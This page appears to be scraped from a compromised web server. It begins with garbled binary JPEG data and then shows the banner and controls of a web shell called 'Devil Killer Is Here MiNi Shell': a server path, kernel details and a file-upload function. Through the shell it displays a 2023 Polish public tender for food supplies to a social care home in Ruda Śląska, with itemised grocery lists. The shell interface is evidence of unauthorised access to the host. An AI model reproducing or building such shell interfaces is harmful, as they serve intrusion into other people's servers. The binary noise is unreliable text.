JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231212/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231212/0054709701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa artykułów żywnościowych dla Domu Pomocy Społecznej „Senior” w Rudzie Śląskiej w pierwszym półroczu 2024r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">DOM POMOCY SPOŁECZNEJ &#34;SENIOR&#34; W RUDZIE ŚLĄSKIEJ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001245904</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Aleksandra Puszkina 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ruda Śląska</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-704</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">techniczny@dpssenior.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.dps-senior.4bip.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Samorządowa jednostka budżetowa </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Całodobowe świadczenie usług w zakresie potrzeb bytowych dla przewlekle, somatycznie chorych </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa artykułów żywnościowych dla Domu Pomocy Społecznej „Senior” w Rudzie Śląskiej w pierwszym półroczu 2024r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-085dfcd2-98d4-11ee-9ee7-e2087ac16d09</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00547097</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00022138/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa artykulów żywnościowych dla Domu pomocy Społecznej &#34;Senior&#34; w Rudzie Śląskiej w I półroczu 2024r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-085dfcd2-98d4-11ee-9ee7-e2087ac16d09 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy” https://ezamowienia.gov.pl/pl/komponent-edukacyjny/<br/>2)	Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust.1 ww. rozporządzenia Prezesa Rady Ministrów w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie, przekazywane w postępowaniu sporządza się w postaci elektronicznej: <br/>a) w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (i przekazuje się jako załączniki) lub <br/>b) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>3)	Komunikacja w postępowaniu, z wyłączeniem składania ofert w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”), za wyjątkiem korzystania z Formularza oferty, ponieważ Zamawiający stosuje własny wzór Formularza oferty. Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). <br/>W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny). <br/>4)	Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia. Zaleca się stosowanie aktualnie wspieranych wersji oprogramowania. <br/>5)	W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>6)	W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i zamawiającego za pośrednictwem Platformy e-Zamówienia, zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: techniczny@dpssenior.pl (nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1 z późn. zm.), dalej „RODO”, przekazujemy następujące informacje:<br/>1)	Administratorem Pani/Pana danych osobowych jest: Dom Pomocy Społecznej „Senior” w Rudzie Śląskiej, ul. Puszkina 7.<br/>2)	Administrator wyznaczył Inspektora Ochrony Danych, z którym może się Pani/Pan skontaktować w sprawach związanych z ochroną danych osobowych w następujący sposób: tel. 32 248 17 74 wewn. 20. <br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego: „Dostawa artykułów żywnościowych dla Domu Pomocy Społecznej „Senior” w Rudzie Śląskiej w pierwszym półroczu 2024r”;<br/>4)	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy Pzp;<br/>5)	Pani/Pana dane osobowe będą przechowywane przez okres, który wyznaczony zostanie przede wszystkim na podstawie rozporządzenia Prezesa Rady Ministrów w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie działania archiwów zakładowych, chyba że przepisy szczególne stanowią inaczej;<br/>6)	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>7)	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8)	Posiada Pani/Pan:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (1);<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych (2);<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9)	nie przysługuje Pani/Panu:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/><br/>(1) wyjaśnienie: skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.<br/><br/>(2) wyjaśnienie: zgodnie z art. 19 ust. 3 ustawy Pzp wystąpienie z zadaniem, o którym mowa w art. 18 ust.1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">8</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp.	Nazwa artykułu	Wymagana gramatura opakowania	Jm	Orientacyjna ilość zamówienia <br/>1	Ananas konserwowy plastry - masa netto bez zalewy	300-1000g	kg	10,00<br/>2	Brzoskwinie konserwowe - masa netto bez zalewy	300-1000g	kg	10,00<br/>3	Chrzan śmietankowy gęsty (minimum 29% zawartości korzenia chrzanu)	150-300g	kg	6,00<br/>4	Chrzan tarty na kwasku cytrynowym	150-300g	kg	33,00<br/>5	Ćwikła z chrzanem	250-500g	kg	3,00<br/>6	Dżemy owocowe niskosłodzone z kawałkami owoców (różne smaki) minimum 40g owoców na 100g produktu	200-500g	kg	45,00<br/>7	Fasola czerwona, biała konserwowa - masa netto bez zalewy	200-500g	kg	24,00<br/>8	Groszek zielony konserwowy soczysty - masa netto bez zalewy	200-500g	kg	55,00<br/>9	Ketchup łagodny minimum 55% przecieru pomidorowego	250-599g	kg	17,00<br/>10	Ketchup łagodny minimum 55% przecieru pomidorowego	600-1000g	kg	52,00<br/>11	Koncentrat pomidorowy minimum 30%	180-250g	kg	20,00<br/>12	Koncentrat pomidorowy minimum 30%	800-1000g	kg	100,00<br/>13	Koncentrat buraczany płynny minimum 50% soku z buraków	180-400g	kg	12,00<br/>14	Krem czekoladowy do smarowania z dodatkiem orzechów - nie więcej niż 34g tłuszczu na 100g produktu	180-400g	kg	12,00<br/>15	Kukurydza konserwowa - masa netto bez zalewy	200-500g	kg	18,00<br/>16	Miód naturalny	200-500g	kg	30,00<br/>17	Musztarda delikatesowa	150-250g	kg	20,00<br/>18	Musztarda delikatesowa	500-1000g	kg	42,00<br/>19	Ocet spirytusowy 10% kwasowości 0,4-0,5l	l	45,00<br/>20	Ogórki konserwowe całe - masa netto bez zalewy	400-1000g	kg	120,00<br/>21	Olej uniwersalny rzepakowy 0,9-1l	l	360,00<br/>22	Oliwa z oliwek extra virgin	0,25-0,5l	l	6,00<br/>23	Papryka konserwowa słodka płaty - masa netto bez zalewy	260-600g	kg	75,00<br/>24	Pomidory bez skórki - krojone, w soku pomidorowym	200-600g	kg	12,00<br/>25	Pomidory bez skórki - krojone, w soku pomidorowym	1500-3000	kg	40,00<br/>26	Powidła śliwkowe - minimum 150g owoców na 100g produktu	250-500g	kg	35,00<br/>27	Przyprawa do zup w płynie z wyciągiem z lubczyku	500-1000g	kg	190,00<br/>28	Seler konserwowy, nitki - masa netto bez zalewy	150-500g	kg	6,50<br/>29	Sos słodko kwaśny np.: chiński, meksykański, itp. z kawałkami warzyw	300-600g	kg	12,00<br/>30	Zaprawa cytrynowa minimum 10% soku z cytryny	0,2-0,5l	l	15,00<br/>31	Zaprawa cytrynowa minimum 10% soku z cytryny	1l	l	175,00<br/>32	Majonez dekoracyjny 180-490g	kg	40,00<br/>33	Majonez dekoracyjny 500-1000g	kg	70,00<br/>34	Mielonka konserwowa - turystyczna, tyrolska, gulasz angielski, itp. - minimum 80% mięsa 100-300g	kg	44,00<br/>35	Szynka konserwowa wieprzowa - minimum 50% mięsa wieprzowego	100-300g	kg	24,00<br/>36	Szynka konserwowa drobiowa -minimum 59% mięsa drobiowego	100-300g	kg	18,00<br/>37	Pasztet drobiowy smakowy (np.: z bazylią i suszonymi pomidorami, z pieczarkami, z koperkiem, z pomidorami, z papryką) - minimum 20% mięsa drobiowego 100-200g	kg	13,00<br/>38	Pasztet drobiowy - minimum 24% mięsa drobiowego	130g-160g	kg	45,00<br/>39	Pasztet drobiowo-wieprzowy - minimum 24% mięsa wieprzowego	100-300g	kg	45,00 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15131000-5 - Konserwy i przetwory z mięsa</p> <p class="mb-0">15330000-0 - Przetworzone owoce i warzywa</p> <p class="mb-0">15410000-5 - Surowe oleje i tłuszcze zwierzęce lub roślinne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp.	Nazwa artykułu	Wymagana gramatura opakowania	Jm	Orientacyjna ilość zamówienia <br/>1	Bazylia suszona	10-40g	kg	0,20<br/>2	Budyń - różne smaki (bez cukru)	35-200g	kg	1,50<br/>3	Budyń - różne smaki (bez cukru)	1000g	kg	24,00<br/>4	Bulion grzybowy sypki lub w kostkach - musi zawierać susz z szlachetnych grzybów leśnych (borowik, podgrzybek) minimum 1,7% 200-500g	kg	2,00<br/>5	Cukier kryształ	1000g	kg	1200,00<br/>6	Cukier wanilinowy	10-50g	kg	0,65<br/>7	Cynamon mielony	10-20g	kg	0,20<br/>8	Czosnek granulowany polski	10-20g	kg	10,00<br/>9	Galaretka owocowa - różne smaki	75-90g	kg	38,00<br/>10	Gałka muszkatołowa, mielona	10-20g	kg	0,10<br/>11	Herbata expresowa owocowa, różne smaki	30-40g	kg	0,40<br/>12	Herbata expresowa czarna	120-150g	kg	30,00<br/>13	Herbata expresowa earl grey - mieszanka mocnych czarnych herbat z dodatkiem olejku z bergamotki	150-200g	kg	35,00<br/>14	Herbata expresowa ziołowa (mięta, melisa, rumianek, pokrzywa)	30-40g	kg	0,30<br/>15	Imbir mielony	10-20g	kg	0,06<br/>16	Kakao naturalne o obniżonej zawartości tłuszczu, extra ciemne (zawartość tłuszczu kakaowego 10-12%)	70-200g	kg	6,50<br/>17	Kasza gryczana - cała palona	500-1000g	kg	50,00<br/>18	Kasza jęczmienna - średnia	500-1000g	kg	50,00<br/>19	Kasza manna	500-1000g	kg	70,00<br/>20	Kaszka mleczno - ryżowa (smakowa)	230-350g	kg	7,00<br/>21	Kawa naturalna mielona 100%	250-500g	kg	25,00<br/>22	Kawa zbożowa rozpuszczalna (zawartość zbóż minimum 72%)	100-500g	kg	20,00<br/>23	Kleik ryżowy	160-200g	kg	6,00<br/>24	Kminek cały	10-20g	kg	0,15<br/>25	Kurkuma	10-20g	kg	0,40<br/>26	Kwasek cytrynowy	10-20g	kg	0,20<br/>27	Liść laurowy	5-20g	kg	0,30<br/>28	Lubczyk suszony 5-10g	kg	0,30<br/>29	Majeranek	5-20g	kg	1,50<br/>30	Makaron 4 jajeczny - łazanki #	500-1000g	kg	50,00<br/>31	Makaron 4 jajeczny - nitki # (domowy, do rosołu) 250g	kg	50,00<br/>32	Makaron z mąki durum - kolanka, rurki, muszelki, świderki #	400-1000g	kg	140,00<br/>33	Mąka pszenna typ 450-500	1000g	kg	370,00<br/>34	Mąka ziemniaczana	1000g	kg	140,00<br/>35	Mąka żytnia razowa na żurek śląski - grubozmielona 500-1000g	kg	18,00<br/>36	Papryka słodka mielona	10-20g	kg	5,00<br/>37	Pieprz czarny mielony	10-20g	kg	4,00<br/>38	Płatki jaglane	200-500g	kg	20,00<br/>39	Płatki kukurydziane - różne smaki (np.: naturalne, czekoladowe, z miodem)	250-500g	kg	21,00<br/>40	Płatki owsiane	200-500g	kg	20,00<br/>41	Przyprawa curry	10g-30g	kg	0,25<br/>42	Płatki ryżowe	200-500g	kg	20,00<br/>43	Przyprawa warzywna do potraw	75-200g	kg	20,00<br/>44	Rosół drobiowy (sypki lub w kostkach) - musi zawierać suszone mięso drobiowe lub ekstrat mięsa drobiowego	80-1000g	kg	36,00<br/>45	Ryż biały	1000g	kg	180,00<br/>46	Sos biały (na bazie mleka)	25-50g	kg	2,50<br/>47	Sos pieczeniowy ciemny	25-50g	kg	4,50<br/>48	Sos sałatkowy - różne smaki (np.: ziołowy, paprykowo-ziołowy, czosnkowy, włoski, francuski, grecki, itp.) ##	5-20g	kg	3,10<br/>49	Sól spożywcza jodowana	1000g	kg	180,00<br/>50	Sucharki bez cukru	200-300g	kg	4,50<br/>51	Ziele angielskie całe	10-20g	kg	0,60<br/>52	Żelatyna spożywcza wieprzowa	50-100g	kg	5,00 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15600000-4 - Produkty przemiału ziarna, skrobi i produktów skrobiowych</p> <p class="mb-0">15800000-6 - Różne produkty spożywcze</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) 